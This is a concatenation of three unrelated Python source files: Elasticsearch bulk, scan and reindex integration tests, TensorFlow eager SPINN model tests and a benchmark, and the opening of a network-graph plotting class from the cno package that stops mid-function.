        for ok, item in helpers.streaming_bulk(self.client, docs, index='test-index', doc_type='answers', refresh=True):
            self.assertTrue(ok)
        self.assertEqual(100, self.client.count(index='test-index', doc_type='answers')['count'])
        self.assertEqual({"answer": 42}, self.client.get(index='test-index', doc_type='answers', id=42)['_source'])
    def test_all_errors_from_chunk_are_raised_on_failure(self):
        # Strict integer mapping so that the string values below fail.
        self.client.indices.create("i",
            {
                "mappings": {"t": {"properties": {"a": {"type": "integer"}}}},
                "settings": {"number_of_shards": 1, "number_of_replicas": 0}
            })
        self.client.cluster.health(wait_for_status="yellow")
        try:
            for ok, item in helpers.streaming_bulk(self.client, [{"a": "b"},
                    {"a": "c"}], index="i", doc_type="t", raise_on_error=True):
                self.assertTrue(ok)
        except helpers.BulkIndexError as e:
            # Both failing documents must be reported, not just the first.
            self.assertEqual(2, len(e.errors))
        else:
            assert False, "exception should have been raised"
    def test_different_op_types(self):
        if self.es_version < (0, 90, 1):
            raise SkipTest('update supported since 0.90.1')
        self.client.index(index='i', doc_type='t', id=45, body={})
        self.client.index(index='i', doc_type='t', id=42, body={})
        # One action per op type: index, delete and update.
        docs = [
            {'_index': 'i', '_type': 't', '_id': 47, 'f': 'v'},
            {'_op_type': 'delete', '_index': 'i', '_type': 't', '_id': 45},
            {'_op_type': 'update', '_index': 'i', '_type': 't', '_id': 42, 'doc': {'answer': 42}}
        ]
        for ok, item in helpers.streaming_bulk(self.client, docs):
            self.assertTrue(ok)
        self.assertFalse(self.client.exists(index='i', doc_type='t', id=45))
        self.assertEqual({'answer': 42}, self.client.get(index='i', id=42)['_source'])
        self.assertEqual({'f': 'v'}, self.client.get(index='i', id=47)['_source'])
    def test_transport_error_can_becaught(self):
        # The second chunk (chunk_size=1) raises; with both raise_* flags off
        # the failure must appear in the results instead of propagating.
        failing_client = FailingBulkClient(self.client)
        docs = [
            {'_index': 'i', '_type': 't', '_id': 47, 'f': 'v'},
            {'_index': 'i', '_type': 't', '_id': 45, 'f': 'v'},
            {'_index': 'i', '_type': 't', '_id': 42, 'f': 'v'},
        ]
        results = list(helpers.streaming_bulk(failing_client, docs, raise_on_exception=False, raise_on_error=False, chunk_size=1))
        self.assertEqual(3, len(results))
        self.assertEqual([True, False, True], [r[0] for r in results])
        exc = results[1][1]['index'].pop('exception')
        self.assertIsInstance(exc, TransportError)
        self.assertEqual(599, exc.status_code)
        self.assertEqual(
            {
                'index': {
                    '_index': 'i',
                    '_type': 't',
                    '_id': 45,
                    'data': {'f': 'v'},
                    'error': "TransportError(599, 'Error!')",
                    'status': 599
                }
            },
            results[1][1]
        )
class TestBulk(ElasticsearchTestCase):
    """Integration tests for the high-level ``helpers.bulk`` wrapper."""
    # ``assertEquals`` (deprecated alias) replaced with ``assertEqual``.
    def test_bulk_works_with_single_item(self):
        docs = [{"answer": 42, '_id': 1}]
        success, failed = helpers.bulk(self.client, docs, index='test-index', doc_type='answers', refresh=True)
        self.assertEqual(1, success)
        self.assertFalse(failed)
        self.assertEqual(1, self.client.count(index='test-index', doc_type='answers')['count'])
        self.assertEqual({"answer": 42}, self.client.get(index='test-index', doc_type='answers', id=1)['_source'])
    def test_all_documents_get_inserted(self):
        docs = [{"answer": x, '_id': x} for x in range(100)]
        success, failed = helpers.bulk(self.client, docs, index='test-index', doc_type='answers', refresh=True)
        self.assertEqual(100, success)
        self.assertFalse(failed)
        self.assertEqual(100, self.client.count(index='test-index', doc_type='answers')['count'])
        self.assertEqual({"answer": 42}, self.client.get(index='test-index', doc_type='answers', id=42)['_source'])
    def test_stats_only_reports_numbers(self):
        # With stats_only=True the second return value is a count, not a list.
        docs = [{"answer": x} for x in range(100)]
        success, failed = helpers.bulk(self.client, docs, index='test-index', doc_type='answers', refresh=True, stats_only=True)
        self.assertEqual(100, success)
        self.assertEqual(0, failed)
        self.assertEqual(100, self.client.count(index='test-index', doc_type='answers')['count'])
    def test_errors_are_reported_correctly(self):
        self.client.indices.create("i",
            {
                "mappings": {"t": {"properties": {"a": {"type": "integer"}}}},
                "settings": {"number_of_shards": 1, "number_of_replicas": 0}
            })
        self.client.cluster.health(wait_for_status="yellow")
        success, failed = helpers.bulk(
            self.client,
            [{"a": 42}, {"a": "c", '_id': 42}],
            index="i",
            doc_type="t",
            raise_on_error=False
        )
        self.assertEqual(1, success)
        self.assertEqual(1, len(failed))
        error = failed[0]
        self.assertEqual('42', error['index']['_id'])
        self.assertEqual('t', error['index']['_type'])
        self.assertEqual('i', error['index']['_index'])
        # The error wording differs across ES versions; accept either form.
        # (A leftover debug print of the error was removed here.)
        self.assertTrue('MapperParsingException' in repr(error['index']['error']) or 'mapper_parsing_exception' in repr(error['index']['error']))
    def test_error_is_raised(self):
        self.client.indices.create("i",
            {
                "mappings": {"t": {"properties": {"a": {"type": "integer"}}}},
                "settings": {"number_of_shards": 1, "number_of_replicas": 0}
            })
        self.client.cluster.health(wait_for_status="yellow")
        self.assertRaises(helpers.BulkIndexError, helpers.bulk,
            self.client,
            [{"a": 42}, {"a": "c"}],
            index="i",
            doc_type="t"
        )
    def test_errors_are_collected_properly(self):
        self.client.indices.create("i",
            {
                "mappings": {"t": {"properties": {"a": {"type": "integer"}}}},
                "settings": {"number_of_shards": 1, "number_of_replicas": 0}
            })
        self.client.cluster.health(wait_for_status="yellow")
        success, failed = helpers.bulk(
            self.client,
            [{"a": 42}, {"a": "c"}],
            index="i",
            doc_type="t",
            stats_only=True,
            raise_on_error=False
        )
        self.assertEqual(1, success)
        self.assertEqual(1, failed)
class TestScan(ElasticsearchTestCase):
    """Integration tests for ``helpers.scan``."""
    # ``assertEquals`` (deprecated alias) replaced with ``assertEqual``.
    def test_order_can_be_preserved(self):
        bulk = []
        for x in range(100):
            bulk.append({"index": {"_index": "test_index", "_type": "answers", "_id": x}})
            bulk.append({"answer": x, "correct": x == 42})
        self.client.bulk(bulk, refresh=True)
        # preserve_order=True must honour the sort in the query.
        docs = list(helpers.scan(self.client, index="test_index", doc_type="answers", size=2, query={"sort": ["answer"]}, preserve_order=True))
        self.assertEqual(100, len(docs))
        self.assertEqual(list(map(str, range(100))), list(d['_id'] for d in docs))
        self.assertEqual(list(range(100)), list(d['_source']['answer'] for d in docs))
    def test_all_documents_are_read(self):
        bulk = []
        for x in range(100):
            bulk.append({"index": {"_index": "test_index", "_type": "answers", "_id": x}})
            bulk.append({"answer": x, "correct": x == 42})
        self.client.bulk(bulk, refresh=True)
        # Without preserve_order only the set of documents is guaranteed.
        docs = list(helpers.scan(self.client, index="test_index", doc_type="answers", size=2))
        self.assertEqual(100, len(docs))
        self.assertEqual(set(map(str, range(100))), set(d['_id'] for d in docs))
        self.assertEqual(set(range(100)), set(d['_source']['answer'] for d in docs))
class TestReindex(ElasticsearchTestCase):
    """Integration tests for ``helpers.reindex``."""
    # ``assertEquals`` (deprecated alias) replaced with ``assertEqual``.
    def setUp(self):
        # Populate test_index with 50 "answers" and 50 "questions" docs.
        super(TestReindex, self).setUp()
        bulk = []
        for x in range(100):
            bulk.append({"index": {"_index": "test_index", "_type": "answers" if x % 2 == 0 else "questions", "_id": x}})
            bulk.append({"answer": x, "correct": x == 42})
        self.client.bulk(bulk, refresh=True)
    def test_reindex_passes_kwargs_to_scan_and_bulk(self):
        helpers.reindex(self.client, "test_index", "prod_index", scan_kwargs={'doc_type': 'answers'}, bulk_kwargs={'refresh': True})
        self.assertTrue(self.client.indices.exists("prod_index"))
        self.assertFalse(self.client.indices.exists_type(index='prod_index', doc_type='questions'))
        self.assertEqual(50, self.client.count(index='prod_index', doc_type='answers')['count'])
        self.assertEqual({"answer": 42, "correct": True}, self.client.get(index="prod_index", doc_type="answers", id=42)['_source'])
    def test_reindex_accepts_a_query(self):
        helpers.reindex(self.client, "test_index", "prod_index", query={"query": {"filtered": {"filter": {"term": {"_type": "answers"}}}}})
        self.client.indices.refresh()
        self.assertTrue(self.client.indices.exists("prod_index"))
        self.assertFalse(self.client.indices.exists_type(index='prod_index', doc_type='questions'))
        self.assertEqual(50, self.client.count(index='prod_index', doc_type='answers')['count'])
        self.assertEqual({"answer": 42, "correct": True}, self.client.get(index="prod_index", doc_type="answers", id=42)['_source'])
    def test_all_documents_get_moved(self):
        helpers.reindex(self.client, "test_index", "prod_index")
        self.client.indices.refresh()
        self.assertTrue(self.client.indices.exists("prod_index"))
        self.assertEqual(50, self.client.count(index='prod_index', doc_type='questions')['count'])
        self.assertEqual(50, self.client.count(index='prod_index', doc_type='answers')['count'])
        self.assertEqual({"answer": 42, "correct": True}, self.client.get(index="prod_index", doc_type="answers", id=42)['_source'])
class TestParentChildReindex(ElasticsearchTestCase):
    """Reindex tests for documents linked by a parent/child mapping."""
    # ``assertEquals`` (deprecated alias) replaced with ``assertEqual``.
    def setUp(self):
        # Two indices sharing a parent/child mapping; one question (id=42)
        # with one answer child (id=47) is indexed into test-index.
        super(TestParentChildReindex, self).setUp()
        body = {
            'settings': {"number_of_shards": 1, "number_of_replicas": 0},
            'mappings': {
                'question': {
                },
                'answer': {
                    '_parent': {'type': 'question'},
                }
            }
        }
        self.client.indices.create(index='test-index', body=body)
        self.client.indices.create(index='real-index', body=body)
        self.client.index(
            index='test-index',
            doc_type='question',
            id=42,
            body={},
        )
        self.client.index(
            index='test-index',
            doc_type='answer',
            id=47,
            body={'some': 'data'},
            parent=42
        )
        self.client.indices.refresh(index='test-index')
    def test_children_are_reindexed_correctly(self):
        helpers.reindex(self.client, 'test-index', 'real-index')
        q = self.client.get(
            index='real-index',
            doc_type='question',
            id=42,
            fields=['_source']
        )
        # Older ES versions wrap requested fields; flatten for comparison.
        if 'fields' in q:
            q.update(q.pop('fields'))
        self.assertEqual(
            {
                '_id': '42',
                '_index': 'real-index',
                '_source': {},
                '_type': 'question',
                '_version': 1,
                'found': True
            }, q
        )
        # NOTE(review): this fetches the child from 'test-index' (the
        # source), not 'real-index' — presumably intentional, but verify.
        q = self.client.get(
            index='test-index',
            doc_type='answer',
            id=47,
            parent=42,
            fields=['_source', '_parent']
        )
        if 'fields' in q:
            q.update(q.pop('fields'))
        if '_routing' in q:
            self.assertEqual(q.pop('_routing'), '42')
        self.assertEqual(
            {
                '_id': '47',
                '_index': 'test-index',
                '_source': {'some': 'data'},
                '_type': 'answer',
                '_version': 1,
                '_parent': '42',
                'found': True
            }, q
        )
| |
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import gc
import glob
import os
import shutil
import tempfile
import time
import numpy as np
from six.moves import xrange # pylint: disable=redefined-builtin
import tensorflow as tf
# pylint: disable=g-bad-import-order
import tensorflow.contrib.eager as tfe
from tensorflow.contrib.eager.python.examples.spinn import data
from third_party.examples.eager.spinn import spinn
from tensorflow.contrib.summary import summary_test_util
from tensorflow.python.eager import test
from tensorflow.python.framework import test_util
# pylint: enable=g-bad-import-order
def _generate_synthetic_snli_data_batch(sequence_length,
                                        batch_size,
                                        vocab_size):
  """Generate a fake batch of SNLI data for testing.

  Args:
    sequence_length: Length of the premise/hypothesis token sequences.
    batch_size: Number of examples in the batch.
    vocab_size: Size of the (fake) vocabulary token ids are drawn from.

  Returns:
    Tuple of (labels, prem, prem_trans, hypo, hypo_trans) tensors, moved to
    GPU when one is available.
  """
  # Premise and hypothesis share the same fixed shift/reduce transition
  # sequence, so build the array once and reuse it.
  transitions = np.array(
      [[3, 3, 2, 3, 3, 3, 2, 2, 2, 3, 3, 3,
        2, 3, 3, 2, 2, 3, 3, 3, 2, 2, 2, 2,
        3, 2, 2]] * batch_size, dtype=np.int64).T
  with tf.device("cpu:0"):
    labels = tf.random_uniform([batch_size], minval=1, maxval=4,
                               dtype=tf.int64)
    prem = tf.random_uniform(
        (sequence_length, batch_size), maxval=vocab_size, dtype=tf.int64)
    prem_trans = tf.constant(transitions)
    hypo = tf.random_uniform(
        (sequence_length, batch_size), maxval=vocab_size, dtype=tf.int64)
    hypo_trans = tf.constant(transitions)
  if tfe.num_gpus():
    labels = labels.gpu()
    prem = prem.gpu()
    prem_trans = prem_trans.gpu()
    hypo = hypo.gpu()
    hypo_trans = hypo_trans.gpu()
  return labels, prem, prem_trans, hypo, hypo_trans
def _test_spinn_config(d_embed, d_out, logdir=None):
config_tuple = collections.namedtuple(
"Config", ["d_hidden", "d_proj", "d_tracker", "predict",
"embed_dropout", "mlp_dropout", "n_mlp_layers", "d_mlp",
"d_out", "projection", "lr", "batch_size", "epochs",
"force_cpu", "logdir", "log_every", "dev_every", "save_every",
"lr_decay_every", "lr_decay_by"])
return config_tuple(
d_hidden=d_embed,
d_proj=d_embed * 2,
d_tracker=8,
predict=False,
embed_dropout=0.1,
mlp_dropout=0.1,
n_mlp_layers=2,
d_mlp=32,
d_out=d_out,
projection=True,
lr=2e-2,
batch_size=2,
epochs=10,
force_cpu=False,
logdir=logdir,
log_every=1,
dev_every=2,
save_every=2,
lr_decay_every=1,
lr_decay_by=0.75)
class SpinnTest(test_util.TensorFlowTestCase):
  """Unit tests for the eager-mode SPINN model and its components."""
  def setUp(self):
    super(SpinnTest, self).setUp()
    # Run on GPU when one is available; fall back to CPU otherwise.
    self._test_device = "gpu:0" if tfe.num_gpus() else "cpu:0"
    self._temp_data_dir = tempfile.mkdtemp()
  def tearDown(self):
    shutil.rmtree(self._temp_data_dir)
    super(SpinnTest, self).tearDown()
  def testBundle(self):
    # spinn._bundle merges a list of per-example (h, c) rows into two
    # stacked column tensors.
    with tf.device(self._test_device):
      lstm_iter = [np.array([[0, 1], [2, 3]], dtype=np.float32),
                   np.array([[0, -1], [-2, -3]], dtype=np.float32),
                   np.array([[0, 2], [4, 6]], dtype=np.float32),
                   np.array([[0, -2], [-4, -6]], dtype=np.float32)]
      out = spinn._bundle(lstm_iter)
      self.assertEqual(2, len(out))
      self.assertEqual(tf.float32, out[0].dtype)
      self.assertEqual(tf.float32, out[1].dtype)
      self.assertAllEqual(np.array([[0, 2, 0, -2, 0, 4, 0, -4]]).T,
                          out[0].numpy())
      self.assertAllEqual(np.array([[1, 3, -1, -3, 2, 6, -2, -6]]).T,
                          out[1].numpy())
  def testUnbunbdle(self):
    # NOTE(review): method name contains a typo ("Unbunbdle"); kept as-is
    # because it is the externally visible test identifier.
    with tf.device(self._test_device):
      state = [np.array([[0, 1, 2], [3, 4, 5]], dtype=np.float32),
               np.array([[0, -1, -2], [-3, -4, -5]], dtype=np.float32)]
      out = spinn._unbundle(state)
      self.assertEqual(2, len(out))
      self.assertEqual(tf.float32, out[0].dtype)
      self.assertEqual(tf.float32, out[1].dtype)
      self.assertAllEqual(np.array([[0, 1, 2, 0, -1, -2]]),
                          out[0].numpy())
      self.assertAllEqual(np.array([[3, 4, 5, -3, -4, -5]]),
                          out[1].numpy())
  def testReducer(self):
    # The Reducer combines left/right children plus tracker state into one
    # output vector per batch element.
    with tf.device(self._test_device):
      batch_size = 3
      size = 10
      tracker_size = 8
      reducer = spinn.Reducer(size, tracker_size=tracker_size)
      left_in = []
      right_in = []
      tracking = []
      for _ in range(batch_size):
        left_in.append(tf.random_normal((1, size * 2)))
        right_in.append(tf.random_normal((1, size * 2)))
        tracking.append(tf.random_normal((1, tracker_size * 2)))
      out = reducer(left_in, right_in, tracking=tracking)
      self.assertEqual(batch_size, len(out))
      self.assertEqual(tf.float32, out[0].dtype)
      self.assertEqual((1, size * 2), out[0].shape)
  def testReduceTreeLSTM(self):
    # Exercise the internal tree-LSTM cell directly.
    with tf.device(self._test_device):
      size = 10
      tracker_size = 8
      reducer = spinn.Reducer(size, tracker_size=tracker_size)
      lstm_in = np.array([[0, 1, 2, 3, 4, 5, 6, 7, 8, 9],
                          [0, -1, -2, -3, -4, -5, -6, -7, -8, -9]],
                         dtype=np.float32)
      c1 = np.array([[0, 1], [2, 3]], dtype=np.float32)
      c2 = np.array([[0, -1], [-2, -3]], dtype=np.float32)
      h, c = reducer._tree_lstm(c1, c2, lstm_in)
      self.assertEqual(tf.float32, h.dtype)
      self.assertEqual(tf.float32, c.dtype)
      self.assertEqual((2, 2), h.shape)
      self.assertEqual((2, 2), c.shape)
  def testTracker(self):
    with tf.device(self._test_device):
      batch_size = 2
      size = 10
      tracker_size = 8
      buffer_length = 18
      stack_size = 3
      tracker = spinn.Tracker(tracker_size, False)
      tracker.reset_state()
      # Create dummy inputs for testing.
      bufs = []
      buf = []
      for _ in range(buffer_length):
        buf.append(tf.random_normal((batch_size, size * 2)))
      bufs.append(buf)
      self.assertEqual(1, len(bufs))
      self.assertEqual(buffer_length, len(bufs[0]))
      self.assertEqual((batch_size, size * 2), bufs[0][0].shape)
      stacks = []
      stack = []
      for _ in range(stack_size):
        stack.append(tf.random_normal((batch_size, size * 2)))
      stacks.append(stack)
      self.assertEqual(1, len(stacks))
      self.assertEqual(3, len(stacks[0]))
      self.assertEqual((batch_size, size * 2), stacks[0][0].shape)
      # Two consecutive calls: output shapes and the recurrent state must
      # stay consistent across steps.
      for _ in range(2):
        out1, out2 = tracker(bufs, stacks)
        self.assertIsNone(out2)
        self.assertEqual(batch_size, len(out1))
        self.assertEqual(tf.float32, out1[0].dtype)
        self.assertEqual((1, tracker_size * 2), out1[0].shape)
        self.assertEqual(tf.float32, tracker.state.c.dtype)
        self.assertEqual((batch_size, tracker_size), tracker.state.c.shape)
        self.assertEqual(tf.float32, tracker.state.h.dtype)
        self.assertEqual((batch_size, tracker_size), tracker.state.h.shape)
  def testSPINN(self):
    with tf.device(self._test_device):
      embedding_dims = 10
      d_tracker = 8
      sequence_length = 15
      num_transitions = 27
      config_tuple = collections.namedtuple(
          "Config", ["d_hidden", "d_proj", "d_tracker", "predict"])
      config = config_tuple(
          embedding_dims, embedding_dims * 2, d_tracker, False)
      s = spinn.SPINN(config)
      # Create some fake data.
      buffers = tf.random_normal((sequence_length, 1, config.d_proj))
      transitions = tf.constant(
          [[3], [3], [2], [3], [3], [3], [2], [2], [2], [3], [3], [3],
           [2], [3], [3], [2], [2], [3], [3], [3], [2], [2], [2], [2],
           [3], [2], [2]], dtype=tf.int64)
      self.assertEqual(tf.int64, transitions.dtype)
      self.assertEqual((num_transitions, 1), transitions.shape)
      out = s(buffers, transitions, training=True)
      self.assertEqual(tf.float32, out.dtype)
      self.assertEqual((1, embedding_dims), out.shape)
  def testSNLIClassifierAndTrainer(self):
    with tf.device(self._test_device):
      vocab_size = 40
      batch_size = 2
      d_embed = 10
      sequence_length = 15
      d_out = 4
      config = _test_spinn_config(d_embed, d_out)
      # Create fake embedding matrix.
      embed = tf.random_normal((vocab_size, d_embed))
      model = spinn.SNLIClassifier(config, embed)
      trainer = spinn.SNLIClassifierTrainer(model, config.lr)
      (labels, prem, prem_trans, hypo,
       hypo_trans) = _generate_synthetic_snli_data_batch(sequence_length,
                                                         batch_size,
                                                         vocab_size)
      # Invoke model under non-training mode.
      logits = model(prem, prem_trans, hypo, hypo_trans, training=False)
      self.assertEqual(tf.float32, logits.dtype)
      self.assertEqual((batch_size, d_out), logits.shape)
      # Invoke model under training model.
      logits = model(prem, prem_trans, hypo, hypo_trans, training=True)
      self.assertEqual(tf.float32, logits.dtype)
      self.assertEqual((batch_size, d_out), logits.shape)
      # Calculate loss.
      loss1 = trainer.loss(labels, logits)
      self.assertEqual(tf.float32, loss1.dtype)
      self.assertEqual((), loss1.shape)
      loss2, logits = trainer.train_batch(
          labels, prem, prem_trans, hypo, hypo_trans)
      self.assertEqual(tf.float32, loss2.dtype)
      self.assertEqual((), loss2.shape)
      self.assertEqual(tf.float32, logits.dtype)
      self.assertEqual((batch_size, d_out), logits.shape)
      # Training on the batch should have led to a change in the loss value.
      self.assertNotEqual(loss1.numpy(), loss2.numpy())
  def testTrainSpinn(self):
    """Test with fake toy SNLI data and GloVe vectors."""
    # 1. Create and load a fake SNLI data file and a fake GloVe embedding file.
    snli_1_0_dir = os.path.join(self._temp_data_dir, "snli/snli_1.0")
    fake_train_file = os.path.join(snli_1_0_dir, "snli_1.0_train.txt")
    os.makedirs(snli_1_0_dir)
    # Four sentences in total.
    with open(fake_train_file, "wt") as f:
      f.write("gold_label\tsentence1_binary_parse\tsentence2_binary_parse\t"
              "sentence1_parse\tsentence2_parse\tsentence1\tsentence2\t"
              "captionID\tpairID\tlabel1\tlabel2\tlabel3\tlabel4\tlabel5\n")
      f.write("neutral\t( ( Foo bar ) . )\t( ( foo . )\t"
              "DummySentence1Parse\tDummySentence2Parse\t"
              "Foo bar.\tfoo baz.\t"
              "4705552913.jpg#2\t4705552913.jpg#2r1n\t"
              "neutral\tentailment\tneutral\tneutral\tneutral\n")
      f.write("contradiction\t( ( Bar foo ) . )\t( ( baz . )\t"
              "DummySentence1Parse\tDummySentence2Parse\t"
              "Foo bar.\tfoo baz.\t"
              "4705552913.jpg#2\t4705552913.jpg#2r1n\t"
              "neutral\tentailment\tneutral\tneutral\tneutral\n")
      f.write("entailment\t( ( Quux quuz ) . )\t( ( grault . )\t"
              "DummySentence1Parse\tDummySentence2Parse\t"
              "Foo bar.\tfoo baz.\t"
              "4705552913.jpg#2\t4705552913.jpg#2r1n\t"
              "neutral\tentailment\tneutral\tneutral\tneutral\n")
      f.write("entailment\t( ( Quuz quux ) . )\t( ( garply . )\t"
              "DummySentence1Parse\tDummySentence2Parse\t"
              "Foo bar.\tfoo baz.\t"
              "4705552913.jpg#2\t4705552913.jpg#2r1n\t"
              "neutral\tentailment\tneutral\tneutral\tneutral\n")
    glove_dir = os.path.join(self._temp_data_dir, "glove")
    os.makedirs(glove_dir)
    glove_file = os.path.join(glove_dir, "glove.42B.300d.txt")
    # One embedding row per word; every component of word i equals i * 0.1.
    words = [".", "foo", "bar", "baz", "quux", "quuz", "grault", "garply"]
    with open(glove_file, "wt") as f:
      for i, word in enumerate(words):
        f.write("%s " % word)
        for j in range(data.WORD_VECTOR_LEN):
          f.write("%.5f" % (i * 0.1))
          if j < data.WORD_VECTOR_LEN - 1:
            f.write(" ")
          else:
            f.write("\n")
    vocab = data.load_vocabulary(self._temp_data_dir)
    word2index, embed = data.load_word_vectors(self._temp_data_dir, vocab)
    train_data = data.SnliData(fake_train_file, word2index)
    dev_data = data.SnliData(fake_train_file, word2index)
    test_data = data.SnliData(fake_train_file, word2index)
    print(embed)
    # 2. Create a fake config.
    config = _test_spinn_config(
        data.WORD_VECTOR_LEN, 4,
        logdir=os.path.join(self._temp_data_dir, "logdir"))
    # 3. Test training of a SPINN model.
    spinn.train_spinn(embed, train_data, dev_data, test_data, config)
    # 4. Load train loss values from the summary files and verify that they
    #    decrease with training.
    summary_file = glob.glob(os.path.join(config.logdir, "events.out.*"))[0]
    events = summary_test_util.events_from_file(summary_file)
    train_losses = [event.summary.value[0].simple_value for event in events
                    if event.summary.value
                    and event.summary.value[0].tag == "train/loss"]
    self.assertEqual(config.epochs, len(train_losses))
    self.assertLess(train_losses[-1], train_losses[0])
class EagerSpinnSNLIClassifierBenchmark(test.Benchmark):
  """Benchmark of eager-mode SPINN SNLI classifier training steps."""
  def benchmarkEagerSpinnSNLIClassifier(self):
    test_device = "gpu:0" if tfe.num_gpus() else "cpu:0"
    with tf.device(test_device):
      burn_in_iterations = 2
      benchmark_iterations = 10
      vocab_size = 1000
      batch_size = 128
      sequence_length = 15
      d_embed = 200
      d_out = 4
      embed = tf.random_normal((vocab_size, d_embed))
      config = _test_spinn_config(d_embed, d_out)
      model = spinn.SNLIClassifier(config, embed)
      trainer = spinn.SNLIClassifierTrainer(model, config.lr)
      (labels, prem, prem_trans, hypo,
       hypo_trans) = _generate_synthetic_snli_data_batch(sequence_length,
                                                         batch_size,
                                                         vocab_size)
      # Warm-up steps are excluded from the timing.
      for _ in range(burn_in_iterations):
        trainer.train_batch(labels, prem, prem_trans, hypo, hypo_trans)
      gc.collect()
      start_time = time.time()
      for _ in xrange(benchmark_iterations):
        trainer.train_batch(labels, prem, prem_trans, hypo, hypo_trans)
      wall_time = time.time() - start_time
      # Named "examples"_per_sec to conform with other benchmarks.
      extras = {"examples_per_sec": benchmark_iterations / wall_time}
      self.report_benchmark(
          name="Eager_SPINN_SNLIClassifier_Benchmark",
          iters=benchmark_iterations,
          wall_time=wall_time,
          extras=extras)
if __name__ == "__main__":
  # Runs the unit tests (and benchmarks when requested by the TF test runner).
  test.main()
| |
# -*- python -*-
#
# This file is part of the cinapps.tcell package
#
# Copyright (c) 2012-2013 - EMBL-EBI
#
# File author(s): Thomas Cokelaer (cokelaer@ebi.ac.uk)
#
# Distributed under the GLPv3 License.
# See accompanying file LICENSE.txt or copy at
# http://www.gnu.org/licenses/gpl-3.0.html
#
# website: www.cellnopt.org
#
##############################################################################
from __future__ import print_function
from matplotlib import colors
import pylab
import networkx as nx
import numpy as np
import pandas as pd
from cno.io.cnograph import CNOGraph
__all__ = ["XCNOGraph"]
class XCNOGraph(CNOGraph):
"""Extra plotting and statistical tools related to CNOGraph"""
    def __init__(self, model=None, midas=None, verbose=False):
        """Constructor: delegates model/MIDAS loading to :class:`CNOGraph`."""
        super(XCNOGraph, self).__init__(model, midas, verbose=verbose)
def hcluster(self):
"""
.. plot::
:include-source:
:width: 50%
from cno import XCNOGraph, cnodata
c = XCNOGraph(cnodata("PKN-ToyPB.sif"), cnodata("MD-ToyPB.csv"))
c.hcluster()
.. warning:: experimental
"""
from scipy.cluster import hierarchy
from scipy.spatial import distance
path_length=nx.all_pairs_shortest_path_length(self.to_undirected())
n = len(self.nodes())
distances=np.zeros((n,n))
nodes = self.nodes()
for u,p in path_length.items():
for v,d in p.items():
distances[nodes.index(u)-1][nodes.index(v)-1] = d
sd = distance.squareform(distances)
hier = hierarchy.average(sd)
pylab.clf();
hierarchy.dendrogram(hier)
pylab.xticks(pylab.xticks()[0], nodes)
    def plot_degree_rank(self, loc='upper right', alpha=0.8, markersize=10,
            node_size=25, layout='spring', marker='o', color='b'):
        """Plot degree of all nodes

        :param str loc: position of the inset graph ('upper right', or
            anything else for lower left)
        :param float alpha: transparency of the inset edges
        :param int markersize: marker size of the rank plot
        :param int node_size: node size in the inset graph
        :param str layout: 'spring' (default), anything else gives a
            circular layout for the inset
        :param str marker: marker symbol of the rank plot
        :param str color: line color of the rank plot

        .. plot::
            :include-source:
            :width: 50%

            from cno import XCNOGraph, cnodata
            c = XCNOGraph(cnodata("PKN-ToyPB.sif"))
            c.plot_degree_rank()
        """
        # Degrees ranked from most to least connected, shown on a log-log
        # scale.
        degree_sequence=sorted(nx.degree(self).values(),reverse=True) # degree sequence
        pylab.clf()
        pylab.loglog(degree_sequence, color+'-', marker=marker,
                markersize=markersize)
        pylab.title("Degree/rank and undirected graph layout")
        pylab.ylabel("Degree")
        pylab.xlabel("Rank")
        # draw graph in inset
        if loc == 'upper right':
            pylab.axes([0.45, 0.45, 0.45, 0.45])
        else:
            pylab.axes([0.1, 0.1, 0.45, 0.45])
        # Only the first connected component of the undirected graph is
        # drawn in the inset.
        UG = self.to_undirected()
        Gcc = list(nx.connected_component_subgraphs(UG))
        Gcc = Gcc[0]
        if layout == 'spring':
            pos = nx.spring_layout(Gcc)
        else:
            pos = nx.circular_layout(Gcc)
        pylab.axis('off')
        nx.draw_networkx_nodes(Gcc, pos, node_size=node_size)
        nx.draw_networkx_edges(Gcc, pos, alpha=alpha)
        pylab.grid()
        #pylab.show()
def plot_feedback_loops_histogram(self, **kargs):
"""Plots histogram of the cycle lengths found in the graph
:return: list of lists containing all found cycles
"""
data = list(nx.simple_cycles(self))
if len(data):
pylab.hist([len(x) for x in data], **kargs)
pylab.title("Length of the feedback loops")
else:
print('No loop/cycle found')
return data
def plot_in_out_degrees(self, show=True,ax=None, kind='kde'):
"""
.. plot::
:include-source:
:width: 50%
from cno import XCNOGraph, cnodata
c = XCNOGraph(cnodata("PKN-ToyPB.sif"), cnodata("MD-ToyPB.csv"))
c.plot_in_out_degrees()
"""
ts1 = pd.Series(self.in_degree())
ts2 = pd.Series(self.out_degree())
df = pd.DataFrame([ts1, ts2]).transpose()
df.columns = ["in","out"]
if show:
df.plot(kind=kind, ax=ax) # kernerl density estimation (estimiation of histogram)
#df = ...
#df.transpose().hist()
return df
    def plot_feedback_loops_species(self, cmap="heat", **kargs):
        """Returns and plots species part of feedback loops

        :param str cmap: a color map
        :return: dictionary with key (species) and values (number of feedback loop
            containing the species) pairs.

        .. plot::
            :include-source:
            :width: 50%

            from cno import XCNOGraph, cnodata
            c = XCNOGraph(cnodata("PKN-ToyPB.sif"), cnodata("MD-ToyPB.csv"))
            c.plot_feedback_loops_species(cmap='heat', colorbar=True)
        """
        if len(self) == 0:
            self.logging.warning("Empty graph")
            return
        # Flatten all simple cycles into one list of node occurrences, so
        # data.count(x) below counts how often x appears in any cycle.
        data = nx.simple_cycles(self)
        data = list(pylab.flatten(data))
        # FIXME: may not be robust to have "and": could be a valid name
        counting = [(x, data.count(x)) for x in self.nodes()
                if data.count(x)!=0 and str(x).startswith('and') is False
                and self.isand(x) is False]
        # Reset the 'loops' attribute on every node before colouring.
        for node in self.nodes():
            self.node[node]['loops'] = 0
        if len(counting):
            # Normalise per-node loop counts to [0, 1] for the colormap.
            M = float(max([count[1] for count in counting]))
            # set a default
            #for node in self.nodes():
            #    self.node[node]['loops'] = "#FFFFFF"
            for count in counting:
                #ratio_count = sm.to_rgba(count[1]/M)
                ratio_count = count[1]/M
                colorHex = ratio_count
                #self.node[count[0]]['loops'] = colorHex
